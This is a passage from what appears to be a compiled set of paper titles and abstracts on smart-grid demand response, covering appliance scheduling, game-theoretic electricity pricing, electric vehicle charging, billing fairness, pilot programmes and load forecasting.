tasks across multiple homes can be scheduled based on the users' requirement, the energy cost and peak demand could be reduced. In this paper the optimal scheduling of smart homes' energy consumption is presented using mixed-integer linear programming. In order to minimize a one-day forecasted energy consumption cost, operation and electricity consumption tasks are scheduled based on different electricity tariffs, electricity task time window and forecasted renewable energy output. A case study of thirty homes with their own microgrid indicates the possibility of cost saving and asset utilization increase. --- paper_title: Demand response models with correlated price data: A robust optimization approach paper_content: In the electricity industry, the processes through which consumers respond to price signals embedded in tariffs by changing their consumption patterns is generally referred to as demand response. In such a context, consumers are offered an opportunity to maximize the surplus derived from electricity usage by actively scheduling consumption over time periods with potentially different energy prices. The objective of this work is to analyze the role of correlation in prices of successive periods over which consumption is to be scheduled, in a demand response context. We use robust optimization techniques to propose an optimization model for consumption scheduling when prices of different periods are highly correlated, and also suggest approaches to correctly incorporate real-world correlated price data to this model. Positive results from quantitative case studies indicate that it is of great importance to employ a solution approach that correctly models correlation among prices when scheduling consumption. --- paper_title: Multi-objective self-scheduling of CHP (combined heat and power)-based microgrids considering demand response programs and ESSs (energy storage systems) paper_content: Today's, policy makers, governments, and academic experts in flourishing societies are interested in employing power systems considering high reliability, quality, and efficiency factors. Moreover, climatic concerns force power system appliers to utilize these systems more environmental friendly. To obtain the mentioned aims, MGs (microgrids) act as key solutions. MGs are invented not only to operate power systems more reliable and efficient but also to penetrate CHP (combined heat and power)-based DG (distributed generation) into power systems with an optimal control on their generation. This paper presents a new optimal operation of a CHP-based MG comprising ESS (energy storage system), three types of thermal power generation units, and DRPs (demand response programs). In this paper, DRPs are treated as virtual generation units along with all of realization constraints. In a multi-objective self-scheduling optimization problem of a MG, the first objective deals with minimizing total operational cost of the CHP-MG in an OPF-based formulation and the second refers to the emission minimization of DGs. The proposed model implements a simple MIP (mixed-integer programming) that can be easily integrated in the MGCC (MG central controller). The effectiveness of the proposed methodology has been investigated on a typical 24-bus MG. --- paper_title: Optimal dispatching model of Smart Home Energy Management System paper_content: In this paper, we developed an optimal dispatching model of Smart Home Energy Management System (SHEMS) with distributed energy resources (DERs) and intelligent domestic appliances. In order to achieve multi-objective optimization between the saving money and living comfortable, we investigate the math models of various components and come up with the new concept “load value” for quantitative measure of users' comfort. Then we set up the control strategies with demand response and adjust the parameters of optimal dispatching model by the load characteristic in this system. Applying this model to one house with Photovoltaic (PV), wind turbine (WT), storage battery and time-of-use prices, the simulation at the end of this paper proves that the energy management system and optimal dispatching model can make users of smart home live in a comfortable and economical way. --- paper_title: A taxonomy of line balancing problems and their solutionapproaches paper_content: Line balancing belongs to a class of intensively studied combinatorial optimization problems known to be NP-hard in general. For several decades, the core problem originally introduced for manual assembly has been extended to suit robotic, machining and disassembly contexts. However, despite various industrial environments and line configurations, often quite similar or even identical mathematical models have been developed. The objective of this survey is to analyze recent research on balancing flow lines within many different industrial contexts in order to classify and compare the means for input data modelling, constraints and objective functions used. This survey covers about 300 studies on line balancing problems. Particular attention is paid to recent publications that have appeared in 2007–2012 to focus on new advances in the state-of-the-art. --- paper_title: Coordinated home energy management for real-time power balancing paper_content: This paper proposes a coordinated home energy management system (HEMS) architecture where the distributed residential units cooperate with each other to achieve real-time power balancing. The economic benefits for the retailer and incentives for the customers to participate in the proposed coordinated HEMS program are given. We formulate the coordinated HEMS design problem as a dynamic programming (DP) and use approximate DP approaches to efficiently handle the design problem. A distributed implementation algorithm based on the convex optimization based dual decomposition technique is also presented. Our focus in the current paper is on the deferrable appliances, such as Plug-in (Hybrid) Electric Vehicles (PHEV), in view of their higher impact on the grid stability. Simulation results shows that the proposed coordinated HEMS architecture can efficiently improve the real-time power balancing. --- paper_title: Cooperative multi-residence demand response scheduling paper_content: This paper is concerned with scheduling of demand response among different residences and a utility company. The utility company has a cost function representing the cost of providing energy to end-users, and this cost can be varying across the scheduling horizon. Each end-user has a “must-run” load, and two types of adjustable loads. The first type must consume a specified total amount of energy over the scheduling horizon, but the consumption can be adjusted across different slots. The second type of load has adjustable power consumption without a total energy requirement, but operation of the load at reduced power results in dissatisfaction of the end-user. The problem amounts to minimizing the total cost electricity plus the total user dissatisfaction (social welfare), subject to the individual load consumption constraints. The problem is convex and can be solved by a distributed subgradient method. The utility company and the end-users exchange Lagrange multipliers—interpreted as pricing signals—and hourly consumption data through the Advanced Metering Infrastructure, in order to converge to the optimal amount of electricity production and the optimal power consumption schedule. --- paper_title: Optimal Real-Time Pricing Algorithm Based on Utility Maximization for Smart Grid paper_content: In this paper, we consider a smart power infrastructure, where several subscribers share a common energy source. Each subscriber is equipped with an energy consumption controller (ECC) unit as part of its smart meter. Each smart meter is connected to not only the power grid but also a communication infrastructure such as a local area network. This allows two-way communication among smart meters. Considering the importance of energy pricing as an essential tool to develop efficient demand side management strategies, we propose a novel real-time pricing algorithm for the future smart grid. We focus on the interactions between the smart meters and the energy provider through the exchange of control messages which contain subscribers' energy consumption and the real-time price information. First, we analytically model the subscribers' preferences and their energy consumption patterns in form of carefully selected utility functions based on concepts from microeconomics. Second, we propose a distributed algorithm which automatically manages the interactions among the ECC units at the smart meters and the energy provider. The algorithm finds the optimal energy consumption levels for each subscriber to maximize the aggregate utility of all subscribers in the system in a fair and efficient fashion. Finally, we show that the energy provider can encourage some desirable consumption patterns among the subscribers by means of the proposed real-time pricing interactions. Simulation results confirm that the proposed distributed algorithm can potentially benefit both subscribers and the energy provider. --- paper_title: Optimal Power Allocation Under Communication Network Externalities paper_content: Efficient resource allocation is an important problem that aims for a “greener” and more environmentally friendly electric power grid. The smart behavior of the newly emerged grid, combined with two-way communication between users and the operator allows for actions like measurement, monitoring, prediction, and control signaling so as to maximize social welfare. We introduce a framework for optimal resource allocation in smart grids that also considers the uncertainty in message signaling. This introduces communication network externalities, added on top of the existing transmission network ones. The task at hand resembles the so called local public goods problem in mathematical economics terminology, a problem impractical to solve using centralized mechanisms. We propose an iterative, decentralized algorithm for its solution. The algorithm is scalable for deployment in large networks since it requires only messages per network user per iteration, where is the number of users. Moreover, it is guaranteed to converge, does not require revelation of private information from each user and all algorithm actions can be realized by programmable smart devices of the grid. --- paper_title: Optimal demand response based on utility maximization in power networks paper_content: Demand side management will be a key component of future smart grid that can help reduce peak load and adapt elastic demand to fluctuating generations. In this paper, we consider households that operate different appliances including PHEVs and batteries and propose a demand response approach based on utility maximization. Each appliance provides a certain benefit depending on the pattern or volume of power it consumes. Each household wishes to optimally schedule its power consumption so as to maximize its individual net benefit subject to various consumption and power flow constraints. We show that there exist time-varying prices that can align individual optimality with social optimality, i.e., under such prices, when the households selfishly optimize their own benefits, they automatically also maximize the social welfare. The utility company can thus use dynamic pricing to coordinate demand responses to the benefit of the overall system. We propose a distributed algorithm for the utility company and the customers to jointly compute this optimal prices and demand schedules. Finally, we present simulation results that illustrate several interesting properties of the proposed scheme. --- paper_title: Vehicle-to-Aggregator Interaction Game paper_content: Electric vehicles (EVs) are likely to become very popular worldwide within the next few years. With possibly millions of such vehicles operating across the country, one can establish a distributed electricity storage system that comprises of the EVs' batteries with a huge total storage capacity. This can help the power grid by providing various ancillary services, once an effective vehicle-to-grid (V2G) market is established. In this paper, we propose a new game-theoretic model to understand the interactions among EVs and aggregators in a V2G market, where EVs participate in providing frequency regulation service to the grid. We develop a smart pricing policy and design a mechanism to achieve optimal frequency regulation performance in a distributed fashion. Simulation results show that our proposed pricing model and designed mechanism work well and can benefit both EVs (in terms of obtaining additional income) and the grid (in terms of achieving the frequency regulation command signal). --- paper_title: Two Market Models for Demand Response in Power Networks paper_content: In this paper, we consider two abstract market models for designing demand response to match power supply and shape power demand, respectively. We characterize the resulting equilibria in competitive as well as oligopolistic markets, and propose distributed demand response algorithms to achieve the equilibria. The models serve as a starting point to include the appliance-level details and constraints for designing practical demand response schemes for smart power grids. --- paper_title: A cheat-proof game theoretic demand response scheme for smart grids paper_content: While demand response has achieved promising results on making the power grid more efficient and reliable, the additional dynamics and flexibility brought by demand response also increase the uncertainty and complexity of the centralized load forecast. In this paper, we propose a game theoretic demand response scheme that can transform the traditional centralized load prediction structure into a distributed load prediction system by the participation of customers. Moreover, since customers are generally rational and thus naturally selfish, they may cheat if cheating can improve their payoff. Therefore, enforcing truth-telling is crucial. We prove analytically and demonstrate with simulations that the proposed game theoretic scheme is cheat-proof, i.e., all customers are motivated to report and consume their true optimal demands and any deviation will lead to a utility loss. We also prove theoretically that the proposed demand response scheme can lead to the solution that maximizes social welfare and is proportionally fair in terms of utility function. Moreover, we propose a simple dynamic pricing algorithm for the power substation to control the total demand of all customers to meet the target demand curve. Finally, simulations are shown to demonstrate the efficiency and effectiveness of the proposed game theoretic algorithm. --- paper_title: A differential game approach to distributed demand side management in smart grid paper_content: Smart grid is a visionary user-centric system that will elevate the conventional power grid system to one which functions more cooperatively, responsively, and economically. Dynamic demand side management is one of the key issues that enable the implementation of smart grid. In this paper, we use the framework of dynamic games to model the distribution demand side management. The market price is characterized as the dynamic state using a sticky price model. A two-layer optimization framework is established. At the lower level, for each player (such as one household), different appliances are scheduled for energy consumption. At the upper level, the dynamic game is used to capture the interaction among different players in their demand responses through the market price. We analyze the N-person nonzero-sum stochastic differential game and characterize its feedback Nash equilibrium. A special case of homogeneous users is investigated in detail and we provide a closed-form solution for the optimal demand response. From the simulation results, we demonstrate the use of demand response strategy from the game-theoretic framework and study the behavior of market price and demand responses to different parameters. --- paper_title: Autonomous Demand-Side Management Based on Game-Theoretic Energy Consumption Scheduling for the Future Smart Grid paper_content: Most of the existing demand-side management programs focus primarily on the interactions between a utility company and its customers/users. In this paper, we present an autonomous and distributed demand-side energy management system among users that takes advantage of a two-way digital communication infrastructure which is envisioned in the future smart grid. We use game theory and formulate an energy consumption scheduling game, where the players are the users and their strategies are the daily schedules of their household appliances and loads. It is assumed that the utility company can adopt adequate pricing tariffs that differentiate the energy usage in time and level. We show that for a common scenario, with a single utility company serving multiple customers, the global optimal performance in terms of minimizing the energy costs is achieved at the Nash equilibrium of the formulated energy consumption scheduling game. The proposed distributed demand-side energy management strategy requires each user to simply apply its best response strategy to the current total load and tariffs in the power distribution system. The users can maintain privacy and do not need to reveal the details on their energy consumption schedules to other users. We also show that users will have the incentives to participate in the energy consumption scheduling game and subscribing to such services. Simulation results confirm that the proposed approach can reduce the peak-to-average ratio of the total energy demand, the total energy costs, as well as each user's individual daily electricity charges. --- paper_title: A nested game-based optimization framework for electricity retailers in the smart grid with residential users and PEVs paper_content: In the smart grid, real-time pricing policy is an important mechanism for incentivizing the consumers to dynamically change or shift their electricity consumption, thereby improving the reliability of the grid. Retailers are incorporated to the smart grid with distributed control mechanism in order to reduce the amount of communication overhead associated with the direction interaction between utility companies and consumers. The retailer procures electricity from both traditional and renewable energy sources, and sells it to its consumers. The consumers include residential users that can only consume power, and plug-in electric vehicles (PEVs) that can either consume power or supply power stored in its battery to the grid. In this work, a novel four-stage nested game model is proposed to model the interaction of the electricity retailer, utility companies, and consumers. The objective of the retailer is to maximize its overall profit as well as perform frequency regulation, whereas the goal of each consumer is to maximize a predefined utility function. In the game theoretic framework, the retailer should decide the amounts of electricity purchased from the renewable and traditional energy sources, respectively, as well as the real-time pricing scheme for its consumers. The consumers will react to the pricing mechanism and maximize their utility functions by adjusting the electricity demand. The optimal solution of the nested game is provided through: (i) finding the subgame perfect equilibrium (SPE) of all the consumers, and (ii) optimizing the retailer's action using the backward induction method. Experimental results demonstrate the effectiveness of the proposed game theoretic modeling and optimization framework. --- paper_title: A game-theoretic approach for optimal time-of-use electricity pricing paper_content: Demand for electricity varies throughout the day, increasing the average cost of power supply. Time-of-use (TOU) pricing has been proposed as a demand-side management (DSM) method to influence user demands. In this paper, we describe a game-theoretic approach to optimize TOU pricing strategies (GT-TOU). We propose models of costs to utility companies arising from user demand fluctuations, and models of user satisfaction with the difference between the nominal demand and the actual consumption. We design utility functions for the company and the users, and obtain a Nash equilibrium using backward induction. In addition to a single-user-type scenario, we also consider a scenario with multiple types of users, each of whom responds differently to time-dependent prices. Numerical examples show that our method is effective in leveling the user demand by setting optimal TOU prices, potentially decreasing costs for the utility companies, and increasing user benefits. An increase in social welfare measure indicates improved market efficiency through TOU pricing. --- paper_title: Dependable Demand Response Management in the Smart Grid: A Stackelberg Game Approach paper_content: Demand Response Management (DRM) is a key component in the smart grid to effectively reduce power generation costs and user bills. However, it has been an open issue to address the DRM problem in a network of multiple utility companies and consumers where every entity is concerned about maximizing its own benefit. In this paper, we propose a Stackelberg game between utility companies and end-users to maximize the revenue of each utility company and the payoff of each user. We derive analytical results for the Stackelberg equilibrium of the game and prove that a unique solution exists. We develop a distributed algorithm which converges to the equilibrium with only local information available for both utility companies and end-users. Though DRM helps to facilitate the reliability of power supply, the smart grid can be succeptible to privacy and security issues because of communication links between the utility companies and the consumers. We study the impact of an attacker who can manipulate the price information from the utility companies. We also propose a scheme based on the concept of shared reserve power to improve the grid reliability and ensure its dependability. --- paper_title: Economics of Electric Vehicle Charging: A Game Theoretic Approach paper_content: In this paper, the problem of grid-to-vehicle energy exchange between a smart grid and plug-in electric vehicle groups (PEVGs) is studied using a noncooperative Stackelberg game. In this game, on the one hand, the smart grid, which acts as a leader, needs to decide on its price so as to optimize its revenue while ensuring the PEVGs' participation. On the other hand, the PEVGs, which act as followers, need to decide on their charging strategies so as to optimize a tradeoff between the benefit from battery charging and the associated cost. Using variational inequalities, it is shown that the proposed game possesses a socially optimal Stackelberg equilibrium in which the grid optimizes its price while the PEVGs choose their equilibrium strategies. A distributed algorithm that enables the PEVGs and the smart grid to reach this equilibrium is proposed and assessed by extensive simulations. Further, the model is extended to a time-varying case that can incorporate and handle slowly varying environments. --- paper_title: An innovative RTP-based residential power scheduling scheme for smart grids paper_content: This paper proposes a Real-Time Pricing (RTP)-based power scheduling scheme as demand response for residential power usage. In this scheme, the Energy Management Controller (EMC) in each home and the service provider form a Stackelberg game, in which the EMC who schedules appliances' operation plays the follower level game, and the provider who sets the real-time prices according to current power usage profile plays the leader level game. The sequential equilibrium is obtained through the information exchange between them. Simulation results indicate that our scheme can not only save money for consumers, but also reduce peak load and the variance between demand and supply, while avoiding the “rebound” peak problem. --- paper_title: Real-time welfare-maximizing regulation allocation in aggregator-EVs systems paper_content: The concept of vehicle-to-grid (V2G) has gained recent interest as more and more electric vehicles (EVs) are put to use. In this paper, we consider a dynamic aggregator-EVs system, where an aggregator centrally coordinates a large number of EVs to perform regulation service. We propose a Welfare-Maximizing Regulation Allocation (WMRA) algorithm for the aggregator to fairly allocate the regulation amount among the EVs. The algorithm operates in real time and does not require any prior knowledge on the statistical information of the system. Compared with previous works, WMRA accommodates a wide spectrum of vital system characteristics, including limited EV battery size, EV self charging/discharging, EV battery degradation cost, and the cost of using external energy sources. Furthermore, our simulation results indicate that WMRA can substantially outperform a suboptimal greedy algorithm. --- paper_title: A bilevel model for electricity retailers' participation in a demand response market environment paper_content: Demand response programmes are seen as one of the contributing solutions to the challenges posed to power systems by the large-scale integration of renewable power sources, mostly due to their intermittent and stochastic nature. Among demand response programmes, real-time pricing schemes for small consumers are believed to have significant potential for peak-shaving and load-shifting, thus relieving the power system while reducing costs and risk for energy retailers. This paper proposes a game theoretical model accounting for the Stackelberg relationship between retailers (leaders) and consumers (followers) in a dynamic price environment. Both players in the game solve an economic optimisation problem subject to stochasticity in prices, weather-related variables and must-serve load. The model allows the determination of the dynamic price-signal delivering maximum retailer profit, and the optimal load pattern for consumers under this pricing. The bilevel programme is reformulated as a single-level MILP, which can be solved using commercial off-the-shelf optimisation software. In an illustrative example, we simulate and compare the dynamic pricing scheme with fixed and time-of-use pricing. We find that the dynamic pricing scheme is the most effective in achieving load-shifting, thus reducing retailer costs for energy procurement and regulation in the wholesale market. Additionally, the redistribution of the saved costs between retailers and consumers is investigated, showing that real-time pricing is less convenient than fixed and time-of-use price for consumers. This implies that careful design of the retail market is needed. Finally, we carry out a sensitivity analysis to analyse the effect of different levels of consumer flexibility. --- paper_title: Auctioning game based Demand Response scheduling in smart grid paper_content: Matching demand to supply is one of the key features of smart grid infrastructure. Transforming conventional static customers into active participants who interact with the electrical utility in real time is the central idea of Demand Response (DR)\Demand Side Management (DSM) in smart grid. In this paper, we decouple utility cost minimization and customer social welfare maximization into two stages. Since the utility is usually more risk averse than risk neutral in real life, this decoupling approach is more realistic than the usually adopted optimization setup, in which the two objectives are combined in a single weighted sum. With a block processing model introduced, in the first stage a convex optimization problem is formulated to minimize utility's generation cost and delay operation cost. An optimal load demand scheduling solution, of the form of water-filling, is derived analytically. Based on the optimal load profile generated in this first stage, repeated Vickrey auctions over time intervals are adopted to allocate load demands among customers while maximizing the social welfare. Despite the fact that truthful bidding is a weakly dominant strategy for all customers in the auctioning game, collusive equilibria do exist and jeopardize utility's profit severely. Analysis on the structure of the Bayesian Nash equilibrium solutions shows that by introducing a positive reserve price the Vickrey auction can be made to be more robust against such collusion by customers. Moreover the corresponding Bayesian Nash equilibrium is essentially unique and guarantees the basic profit of the utility. We further discuss how customers' valuations and bidding strategies change over time for the repeated Vickrey auction model. Simulation results emphasizing the influences of reserve price and time interval size on utility's profit is also presented. --- paper_title: Lessons learned from smart grid enabled pricing programs paper_content: Dynamic pricing is often considered an essential part of demand response programs, particularly when considering the advent of new consumer-facing technologies, which will eventually reshape the relationship between utility and consumer. This paper presents and analyzes case studies of several dynamic pricing programs, including different proposed rates, enabling technologies and incentives. Program successes are evaluated based on a combination of peak load reduction, customer bill impacts and customer satisfaction. An analysis of lessons learned is provided on how various factors can affect the success, scalability and applicability of smart grid demand response programs. --- paper_title: Investing in smart grids within the market paradigm: The case of the Netherlands and its relevance for China paper_content: Abstract The introduction of market forces in the energy sector in the Netherlands and elsewhere in Europe has drastically changed the climate for investments in the electricity infrastructure. In contrast with the former public monopoly situation, many new uncertainties need to be taken into account in network investment decisions. Another marked difference is the fragmentation of energy markets and the entrance of new players on the energy market stage, often in new roles. The upgrading of electricity networks to create so-called smart grids has therewith become a multi-actor investment problem, which requires a well-designed and well-managed process. For the specific case of the Netherlands, the challenges of smart grid development are explored in depth. As several competing scenarios are possible for the realization of smart grids, it is likely that the scenario first entering the implementation stage will have a first-mover advantage. This, in combination with the split incentive issue for smart grids, results in the conclusion that the realization of smart grids needs public support. Similar outcomes are observed in other European countries despite markedly different local conditions and drivers for the smart grid. It seems that smart public policy intervention is needed to reduce the overwhelming uncertainties related to smart grid investments, which by far exceed the normal investment risk as encountered in network expansion. Finally, the relevance of these findings is discussed for the future of the electricity sector in China's emerging economy. --- paper_title: Demand Response From Household Customers: Experiences From a Pilot Study in Norway paper_content: This paper presents experiences from a pilot study focusing on daily demand response from households, utilizing smart metering, remote load control, pricing based on the hourly spot price combined with a time of day network tariff, and a token provided to the customers indicating peak hours. The observed demand response was 1 kWh/h for customers with standard electrical water heaters. By aggregating this response, the potential for demand response from 50% of Norwegian households can be estimated at 1000 MWh/h (4.2% of registered peak load demand in Norway). A cost-effective realization of this potential should have high focus when considering smart metering technology. From a market perspective, a potential load reduction of this size should be bid into the day ahead market. Demand response to price (the day after) will not affect the price, but might create imbalances and the need for activating balancing resources, creating additional costs. --- paper_title: How to Engage Consumers in Demand Response: A Contract Perspective paper_content: Nowadays, the European electricity systems are evolving towards a generation mix that is more decentralised, less predictable and less flexible to operate. In this context, additional flexibility is expected to be provided by the demand side. Thus, how to engage consumers to participate in demand response is becoming a pressing issue. In this paper, we provide an analytical framework to assess consumers’ potential and willingness to participate in active demand response from a contract perspective. On that basis, we present policy recommendations to empower and protect consumers in their shift to active demand response participants. --- paper_title: Achieving Optimality and Fairness in Autonomous Demand Response: Benchmarks and Billing Mechanisms paper_content: Autonomous demand response (DR) programs are scalable and result in a minimal control overhead on utilities. The idea is to equip each user with an energy consumption scheduling (ECS) device to automatically control the user's flexible load to minimize his energy expenditure, based on the updated electricity pricing information. While most prior works on autonomous DR have focused on coordinating the operation of ECS devices in order to achieve various system-wide goals, such as minimizing the total cost of generation or minimizing the peak-to-average ratio in the load demand, they fall short addressing the important issue of fairness. That is, while they usually guarantee optimality, they do not assure that the participating users are rewarded according to their contributions in achieving the overall system's design objectives. Similarly, they do not address the important problem of co-existence when only a sub-set of users participate in a deployed autonomous DR program. In this paper, we seek to tackle these shortcomings and design new autonomous DR systems that can achieve both optimality and fairness. In this regard, we first develop a centralized DR system to serve as a benchmark. Then, we develop a smart electricity billing mechanism that can enforce both optimality and fairness in autonomous DR systems in a decentralized fashion. --- paper_title: Dynamic Pricing? Not So Fast! A Residential Consumer Perspective paper_content: With the installation of smart metering, will residential customers be moved to "dynamic" pricing? Some supporters of changing residential rate design from a fixed and stable rate structure believe customers should be required to take electric service with time-variant price signals. Not so fast, though! There are real implications associated with this strategy. --- paper_title: DEMAND RESPONSE EXPERIENCE IN EUROPE: POLICIES, PROGRAMMES AND IMPLEMENTATION paper_content: Over the last few years, load growth, increases in intermittent generation, declining technology costs and increasing recognition of the importance of customer behaviour in energy markets have brought about a change in the focus of Demand Response (DR) in Europe. The long standing programmes involving large industries, through interruptible tariffs and time of day pricing, have been increasingly complemented by programmes aimed at commercial and residential customer groups. Developments in DR vary substantially across Europe reflecting national conditions and triggered by different sets of policies, programmes and implementation schemes. This paper examines experiences within European countries as well as at European Union (EU) level, with the aim of understanding which factors have facilitated or impeded advances in DR. It describes initiatives, studies and policies of various European countries, with in-depth case studies of the UK, Italy and Spain. It is concluded that while business programmes, technical and economic potentials vary across Europe, there are common reasons as to why coordinated DR policies have been slow to emerge. This is because of the limited knowledge on DR energy saving capacities; high cost estimates for DR technologies and infrastructures; and policies focused on creating the conditions for liberalising the EU energy markets. --- paper_title: Tackling co-existence and fairness challenges in autonomous Demand Side Management paper_content: Consider a smart grid system in which every user may or may not choose to participate in Demand Side Management (DSM). This will lead to a general co-existence problem between participant and non-participant users. To gain insights, first, we show that some existing electricity billing mechanisms suffer from severe fairness and co-existence defects. Next, we propose an alternative billing mechanism that can tackle the coexistence and fairness problems by taking into account not only the users' total load, but also the exact shape of their load profiles. Our analytical results provide mild sufficient conditions on the choice of system parameters to assure fairness. Furthermore, our simulation results confirm that the proposed billing mechanism significantly improves the fairness index of the DSM system. --- paper_title: Smart Grids and Beyond: Achieving the Full Potential of Electricity Systems paper_content: This paper explores how electricity systems may evolve in the 21st century. The paper focuses on some funda- mental challenges facing the utilization of electricity today and for years to come. Paralleling the challenges, several directions of how new solutions may emerge are suggested. In this con- text, some new approaches to manage power system develop- ment and deployment are outlined. --- paper_title: Deployment of demand response as a real-time resource in organized markets paper_content: The use of DR as a dispatchable resource in the real-time energy markets should be encouraged, not discouraged. We are fortunate that the smart-grid technology now exists to fully exploit this valuable resource. --- paper_title: Price-Responsive Demand Management for a Smart Grid World paper_content: Price-responsive demand is essential for the success of a smart grid. However, existing demand-response programs run the risk of causing inefficient price formation. This problem can be solved if each retail customer could establish a contract-based baseline through demand subscription before joining a demand-response program. --- paper_title: Incorporating fairness within Demand response programs in smart grid paper_content: Basic Demand response (DR) programs aim to modulate the demand of electricity in accordance with its supply. The existing DR programs have only been of limited success, though the participation has steadily increased in the recent past. This paper establishes the lack of fairness principles within the DR programs, as perceived by the customers to be one of the key deterrents. Fair DR (FDR) scheme criteria are defined and compared with existing pricing schemes. In this context, a simplified pricing model that takes into consideration fairness criteria for residential category is also proposed in this paper. The proposed pricing model is simulated in Gridlab-D and the results are compared with that of the flat and the price based pricing schemes. Initial results establish that our pricing scheme is fair, it flattens the demand curve over a day and provides a win-win situation for both - the customer and the utility company. --- paper_title: Case studies of smart grid demand response programs in North America paper_content: Demand response services that engage consumers are an important emerging aspect of the smart grid. The advent of new consumer-facing technologies that communicate with the electric utility is enabling this transformation. This paper presents and analyzes case studies of different electric utility programs, including enabling technologies and incentives, on smart grid demand response. The program successes are evaluated in terms of reduction in peak load and/or customer energy usage and customer satisfaction. An analysis of lessons learned is provided on how various incentives can affect the success and scalability of smart grid demand response programs. --- paper_title: Piloting the Smart Grid paper_content: To address the likely impact of the smart grid on customers, utilities, and society as a whole, it may be necessary to conduct a pilot. When should a pilot be conducted and how should it be conducted? What validity criteria should the pilot satisfy? Here are issues to consider. --- paper_title: The Ethics of Dynamic Pricing paper_content: Dynamic pricing has garnered much interest among regulators and utilities, since it has the potential for lowering energy costs for society. But the deployment of dynamic pricing has been remarkably tepid. The underlying premise is that dynamic pricing is unfair. But the presumption of unfairness in dynamic pricing rests on an assumption of fairness in today's tariffs. --- paper_title: Intelligent Scheduling of Hybrid and Electric Vehicle Storage Capacity in a Parking Lot for Profit Maximization in Grid Power Transactions paper_content: This paper proposes an intelligent method for scheduling usage of available energy storage capacity from plug-in hybrid electric vehicles (PHEV) and electric vehicles (EV). The batteries on these vehicles can either provide power to the grid when parked, known as vehicle-to-grid (V2G) concept or take power from the grid to charge the batteries on the vehicles. A scalable parking lot model is developed with different parameters assigned to fleets of vehicles. The size of the parking lot is assumed to be large enough to accommodate the number of vehicles performing grid transactions. In order to figure out the appropriate charge and discharge times throughout the day, binary particle swarm optimization is applied. Price curves from the California ISO database are used in this study to have realistic price fluctuations. Finding optimal solutions that maximize profits to vehicle owners while satisfying system and vehicle owners constraints is the objective of this study. Different fleets of vehicles are used to approximate varying customer base and demonstrate the scalability of parking lots for V2G. The results are compared for consistency and scalability. Discussions on how this technique can be applied to other grid issues such as peaking power are included at the end. --- paper_title: Predicting user comfort level using machine learning for Smart Grid environments paper_content: Smart Grid with Time-of-Use (TOU) pricing brings new ways of cutting costs for energy consumers and conserving energy. It is done by utilities suggesting the user ways to use devices to lower their energy bills keeping in mind its own benefits in smoothening the peak demand curve. However, as suggested in previous related research, user's comfort need must be addressed in order to make the system work efficiently. In this work, we validate the hypothesis that user preferences and habits can be learned and user comfort level for new patterns of device usage can be predicted. We investigate how machine learning algorithms specifically supervised machine learning algorithms can be used to achieve this. We also compare the prediction accuracies of three commonly used supervised learning algorithms, as well as the effect that the number of training samples has on the prediction accuracy. Further more, we analyse how sensitive prediction accuracies yielded by each algorithm are to the number of training samples. --- paper_title: Artificial neural network for load forecasting in smart grid paper_content: It is an irresistible trend of the electric power improvement for developing the smart grid, which applies a large amount of new technologies in power generation, transmission, distribution and utilization to achieve optimization of the power configuration and energy saving. As one of the key links to make a grid smarter, load forecast plays a significant role in planning and operation in power system. Many ways such as Expert Systems, Grey System Theory, and Artificial Neural Network (ANN) and so on are employed into load forecast to do the simulation. This paper intends to illustrate the representation of the ANN applied in load forecast based on practical situation in Ontario Province, Canada. --- paper_title: Autonomous Demand-Side Management Based on Game-Theoretic Energy Consumption Scheduling for the Future Smart Grid paper_content: Most of the existing demand-side management programs focus primarily on the interactions between a utility company and its customers/users. In this paper, we present an autonomous and distributed demand-side energy management system among users that takes advantage of a two-way digital communication infrastructure which is envisioned in the future smart grid. We use game theory and formulate an energy consumption scheduling game, where the players are the users and their strategies are the daily schedules of their household appliances and loads. It is assumed that the utility company can adopt adequate pricing tariffs that differentiate the energy usage in time and level. We show that for a common scenario, with a single utility company serving multiple customers, the global optimal performance in terms of minimizing the energy costs is achieved at the Nash equilibrium of the formulated energy consumption scheduling game. The proposed distributed demand-side energy management strategy requires each user to simply apply its best response strategy to the current total load and tariffs in the power distribution system. The users can maintain privacy and do not need to reveal the details on their energy consumption schedules to other users. We also show that users will have the incentives to participate in the energy consumption scheduling game and subscribing to such services. Simulation results confirm that the proposed approach can reduce the peak-to-average ratio of the total energy demand, the total energy costs, as well as each user's individual daily electricity charges. --- paper_title: A game-theoretic approach for optimal time-of-use electricity pricing paper_content: Demand for electricity varies throughout the day, increasing the average cost of power supply. Time-of-use (TOU) pricing has been proposed as a demand-side management (DSM) method to influence user demands. In this paper, we describe a game-theoretic approach to optimize TOU pricing strategies (GT-TOU). We propose models of costs to utility companies arising from user demand fluctuations, and models of user satisfaction with the difference between the nominal demand and the actual consumption. We design utility functions for the company and the users, and obtain a Nash equilibrium using backward induction. In addition to a single-user-type scenario, we also consider a scenario with multiple types of users, each of whom responds differently to time-dependent prices. Numerical examples show that our method is effective in leveling the user demand by setting optimal TOU prices, potentially decreasing costs for the utility companies, and increasing user benefits. An increase in social welfare measure indicates improved market efficiency through TOU pricing. --- paper_title: Forecasting for smart grid applications with Higher Order Neural Networks paper_content: This work presents the design of a neural network which combines higher order terms in its input layer and an Extended Kalman Filter (EKF) based algorithm for its training. The neural network based scheme is defined as a Higher Order Neural Network (HONN) and its applicability is illustrated by means of time series forecasting for three important variables present in smart grids: Electric Load Demand (ELD), Wind Speed (WS) and Wind Energy Generation (WEG). The proposed model is trained and tested using real data values taken from a microgrid system in the UADY School of Engineering. The length of the regression vector is determined via the Lipschitz quotients methodology. --- paper_title: Modeling and forecasting hourly electric load by multiple linear regression with interactions paper_content: Short-term electric load modeling and forecasting has been intensively studied during the past 50 years. With the emerging development of smart grid technologies, demand side management (DSM) starts to attract the attention of electric utilities again. To perform a decent DSM, beyond when and how much the demand will be, the utilities are facing another question: why is the electricity being consumed? In other words, what are the factors driving the fluctuation of the electric load at a particular time period? Understanding this issue can also be beneficial for the electric load forecasting with the purpose of energy purchase. This paper proposes a modern treatment of a classic technique, multiple linear regression, to model the hourly demand and investigate the causality of the consumption of electric energy. Various interactions are discovered, discussed, tested, and interpreted in this paper. The proposed approach has been used to generate the 3-year hourly energy demand forecast for a US utility. --- paper_title: Power prediction in smart grids with evolutionary local kernel regression paper_content: Electric grids are moving from a centralized single supply chain towards a decentralized bidirectional grid of suppliers and consumers in an uncertain and dynamic scenario Soon, the growing smart meter infrastructure will allow the collection of terabytes of detailed data about the grid condition, e.g., the state of renewable electric energy producers or the power consumption of millions of private customers, in very short time steps For reliable prediction strong and fast regression methods are necessary that are able to cope with these challenges In this paper we introduce a novel regression technique, i.e., evolutionary local kernel regression, a kernel regression variant based on local Nadaraya-Watson estimators with independent bandwidths distributed in data space The model is regularized with 